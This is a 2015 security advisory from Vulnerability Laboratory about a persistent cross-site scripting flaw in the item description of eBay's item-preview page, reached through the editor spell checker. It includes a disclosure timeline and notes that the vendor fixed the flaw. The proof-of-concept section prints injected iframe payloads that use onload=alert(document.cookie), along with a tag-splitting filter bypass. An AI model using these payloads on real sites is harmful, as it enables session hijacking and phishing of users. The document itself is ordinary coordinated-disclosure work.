[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Ebay Inc Xcom #4 - (Item Preview) Persistent Vulnerability



Document Title:
===============
Ebay Inc Xcom #4 - (Item Preview) Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1215




Release Date:
=============
2015-03-23


Vulnerability Laboratory ID (VL-ID):
====================================
1215


Common Vulnerability Scoring System:
====================================
4.1


Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed 
by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned 
solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model 
to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.

Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting 
this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability 
inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://magento.com/security  &  http://magento.com/security )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation web vulnerability in the official Ebay Xcom online-service content management system.


Vulnerability Disclosure Timeline:
==================================
2014-02-21: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security)
2014-02-22: Vendor Notification (eBay Inc Security Research Team)
2014-03-06: Vendor Response/Feedback (eBay Inc Security Research Team)
2015-03-19: Vendor Fix/Patch Information (eBay Inc Developer Team)
2015-03-23: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Ebay Inc.
Product: Ebay Inc - Official WebSite Magento Application & API 2014 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Ebay Xcom online-service content management system.
The issue allows remote attackers to inject own malicious script codes to the application-side of the vulnerable module or affected web-service.

The persistent input validation web vulnerability is located in the `item description` value of the `preview` module. The affected context is 
requested through the vulnerable eBayISAPI.dll file. The vulnerability allows remote attackers to inject script codes by usage of the vulnerable 
editor spell checker to execute the persistent script codes in the valid preview page link of the item description. The attack vector of the 
vulnerability is persistent (application-side) and the request method to inject is POST. The valid preview link can be exchanged with an exisiting 
users session because of no secure implemented cookie restriction. 

To bypass the validation of the editor it is required to use the spell checker code execution in the lithium forum discovered in 2012 by me to paypal.
After the inject of the script code the replace, parses the context the frame gets injected. Regular the preview disallow an user to preview with item 
descriptions with persistent injected script code. To proof we injected a regular frame and used the editor to replace regular texts with script codes 
in the description. After the unsuccessful proof we tried the same and splitted the tag to bypass the validation successfully.

The security risk of the application-side validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.1. 
Exploitation of the persistent input validation vulnerability requires a low privileged ebay magento application user account and low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirect and persistent manipulation 
of affected or connected module context.

Request Method(s): (Inject)
				[+] POST

Vulnerable Module(s):
				[+] Editor > Spell Check

Vulnerable Parameter(s):
				[+] item description

Affected Module(s):
				[+] Item Preview - Description Context


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged web-application user account and low user interaction. 
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Affected Drafts & Editor Spell Check  >
http://cgi5.ebay.com/ws/eBayISAPI.dll

PoC: Preview
http://previewitem.ebay.com/ws/eBayISAPI.dll?PreviewItemV4&SessionId=233253838121&SeqId=1225637906&md=1&noPreviewHeader=1


PoC: eBayISAPI.dll?PreviewItem
<div><div class="vi-cd"><span style="float: left;" class="vi-br">Seller assumes all responsibility for this listing.</span><span class="vi-xs vi-lk">
Item number: 233253838121</span><div class="vi-iw"><div class="cr-w cr-bt c-gy-bdr"><div class="cr-cnt"><table class="vi-ia-attrGroup" cellpadding="0" 
cellspacing="0" width="100%"><tbody><tr><td id="vi-ia-attrTableFirstRowTd">&#8203;&#8203;&#8203;&#8203;&#8203;<h3 class="vi-ia-attrGroupTitle vi-ds2-subt">Item specifics</h3></td></tr>
<tr><td><table cellpadding="0" cellspacing="0" width="100%"><tbody><tr><th id="vi-ia-attrSectionLastRowTd" class="vi-ia-hdAl vi-ia-attrLabel vi-ia-attrColPadding" 
align="left" nowrap="nowrap">Condition: </th><td headers="v4-107" id="vi-ia-attrSectionLastRowTd" class="vi-ia-attrColPadding" width="50.0%">
<div style="vertical-align:top">Like New<span style="margin-left:10px"><span><span><a href="" id="BUBbhlp1" class="bh-La"><b class="g-hdn">Click for help</b>
<b class="bh-hlp"></b></a><div style="display:none"><div id="cnbhlp1_oly" class="bh-pad"><div class="bh-bcnt"><span>An item that looks as if it was just taken 
out of shrink wrap. No visible wear, and all facets of the item are flawless and intact. See the seller’s listing for full details and description of any imperfections.
</span></div><div class="bh-fc"><div><div class="lb-w"><b class="hl-nv lb-bo"><a href="" class="vi-ia-rm">See all condition definitions<b class="g-hdn">- opens in 
a new window or tab</b></a></b></div></div></div><b id="bhlp1_olyARROW" class="bh-hc_lb"></b></div></div><div id="bhlp1_olyOly_Outer" class="g-hdn" style="visibility : 
hidden;width:300px"><div id="cnbhlp1_oly"><div></div><a id="bhlp1_oly_stA" href="" class="g-hdn">BubbleHelp Opens Start of layer</a><a id="bhlp1_oly_enA" 
href="" class="g-hdn">BubbleHelp End of layer</a></div></div></span></span><div style="clear:both"></div></span><div style="margin-top:5px;">
<span style="margin-left:-86px;margin-right:10px;">Seller Notes:</span><span>""><iframe src=a>%20"><iframe src=a><iframe>%20<iframe 
src="x">"><iframe src=a>%20">    "><iframe src=a>%20"><iframe src=a><iframe>%20<img src="x">"><iframe 
src=a>%20">"</span></div></div></td><th id="vi-ia-attrSectionLastRowTd" class="vi-ia-hdAl vi-ia-attrLabel vi-ia-attrColPadding" align="left" 
nowrap="nowrap">Country/Region of Manufacture: </th><td headers="v4-108" id="vi-ia-attrSectionLastRowTd" class="vi-ia-attrColPadding" width="50.0%">Algeria</td></tr></tbody></table></td></tr></tbody></table></div></div></div></div><table width="100%"><tbody><tr><td class="storeDescTd" 
valign="top"><div><div class="item_description"><div id="ngvi_desc_div" class="d-pad"><div>
<div><b>sacandaga [PERSISTENT INJECTED SCRIPT CODE!]"><iframe src="http://vulnerability-lab.com"; onload=alert(document.cookie)"><iframe src=http://vulnerability-lab.com onload=alert(document.cookie) <
<iframe src=http://x>%20"> as dasd as "iframe"> fwefwefw  holla</b><br></iframe>&#8203;&#8203;&#8203;&#8203;&#8203;</b></div></div></div></div></div></td></tr></tbody></table><div><div></div></div></div>


Reference(s):
http://previewitem.ebay.com/
http://previewitem.ebay.com/ws/eBayISAPI.dll
http://cgi5.ebay.com/ws/eBayISAPI.dll
http://previewitem.ebay.com/ws/eBayISAPI.dll?PreviewItemV4&SessionId=233253838121&SeqId=1225637906&md=1&noPreviewHeader=1


Security Risk:
==============
The security risk of the persistent input validation web vulnerability and filter bypass issue is estimated as medium. (CVSS 4.1)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@xxxxxxxxxxxxxxxxx) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@xxxxxxxxxxxxxxxxxxxxx 	- research@xxxxxxxxxxxxxxxxxxxxx 	       		- admin@xxxxxxxxxxxxxxxxx
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx
PGP KEY: http://www.vulnerability-lab.com/keys/admin@xxxxxxxxxxxxxxxxxxxxx%280x198E9928%29.txt